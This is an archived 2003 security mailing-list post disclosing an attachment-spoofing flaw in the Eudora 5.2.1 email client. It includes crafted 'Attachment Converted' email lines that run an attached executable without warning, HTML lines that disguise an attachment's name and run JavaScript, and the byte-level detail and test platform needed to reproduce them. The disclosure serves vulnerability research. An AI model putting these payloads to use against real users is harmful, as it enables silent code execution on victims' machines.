lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200305270227.h4R2RL7185441@milan.maths.usyd.edu.au>
From: psz at maths.usyd.edu.au (Paul Szabo)
Subject: Re: Eudora 5.2.1 attachment spoof

Building on my Eudora attachment spoof

  http://www.securityfocus.com/archive/1/322286

I have now found better games to play:

  From: me
  To: you
  
  Ensure victim has both attachments 'calc' and 'calc.exe' (sent in
  this, or previous, email). Then the following shows 'windows' icon
  and runs calc.exe without warning when clicked:
  Attachment Converted<CR>: attach\calc

Other mis-features I found (but I do not see how to make them into a
credible exploit):

  If we can guess the full path to the attach directory then can
  change the name shown to anything we like, but get broken icon:
  Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a>
  
  Javascript done with InternetExplorer even if we set own viewer:
  Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a>

Replace the four-character <CR> marker with the single byte CR=0x0d in all
of above. Tested with Eudora 5.2.1 on Windows 2000.

Cheers,

Paul Szabo - psz@...hs.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ